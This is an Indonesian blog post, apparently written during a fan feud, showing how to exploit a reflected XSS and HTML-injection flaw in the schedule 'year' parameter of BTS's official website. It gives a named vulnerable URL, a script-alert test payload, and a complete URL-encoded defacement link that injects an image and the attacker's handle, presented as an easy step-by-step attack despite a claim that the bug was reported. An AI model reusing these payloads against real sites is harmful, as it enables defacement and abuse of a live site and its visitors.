Contoh Bug XSS pada Website BTS
Belakangan ini media sosial ramai pembahasan mengenai penggemar Reemar Martin Vs BTS yang dimana para metizen +62 meributkan nya, Dan salah satu Reemar Garis Keras pun bertindak mencoba menyerang melewati situs Resmi milik BTS yaitu
https://ibighit.com/bts/
Dan hal hasil salah satu Reemar Garis Keras pun berhasil menyerang ke situs BTS yang dimana situs itu memiliki Bug yang akan kita bahas kali ini.
Langsung aja sesuai judul Reflected XSS pada website BTS Kpop. Saya mendapatkan informasi mengenai penemuan Bug pada website BTS dari teman saya yang di kubu Reemar Garis Keras Bug yang dia dapatkan adalah, Bug HTML Injection & XSS, Url Poisoning, pada Colum schedule di Pencarian Tahun, Link dibawah ini.
https://ibighit.com/bts/eng/schedule/?year=
Oke langsung aja tanpa banyak basa basi Kita masukan payload XSS, Tepat dibelakang Url di atas:
'"><script></script>'"><img src=x onerror=prompt(1);>
Setelah memasukkan Payload jika masih vuln akan muncul pop up seperti ini gambar dibawah ini:
Kita sudah menemukan Bug Xss pada website BTS, Lalu bagaimana Cara Saya Memunculkan Gambar dan nickname Di website tersebut? Caranya cukup Mudah. Cukup kalian masukan payload dibawah ini:
%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://i.ibb.co/qph9Sdz/indonesian-error-system-20190830-181205.jpg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20Root./Kandol%20%20%20%20%3C/font%3E%3C/br%3E
Contohnya seperti ini :
https://ibighit.com/bts/eng/schedule/?year=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://i.ibb.co/qph9Sdz/indonesian-error-system-20190830-181205.jpg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20Root./Kandol%20%20%20%20%3C/font%3E%3C/br%3E
Jika Websitenya Belum diperbaiki Maka akan muncul Gambar seperti dibawah ini:
Cukup Mudah bukan? Jika ada yang bertanya apa sih itu Bug XSS silakan Baca dipostingan Saya sebelumnya https://kandoltechno.blogspot.com/2019/10/apa-itu-xss.html?m=1 .
Untuk bugnya sendiri Sudah Di Laporkan Ke pihak Developer Websitenya Sendiri Oleh teman saya. Semoga informasi saya Bermanfaat untuk kalian semua.
Sc Bug: FCA || Cr0t_D1Lu4R
#Reemar_Martin
#BTS_Army
#BTS
0 Response to "Contoh Bug XSS pada Website BTS"
Post a Comment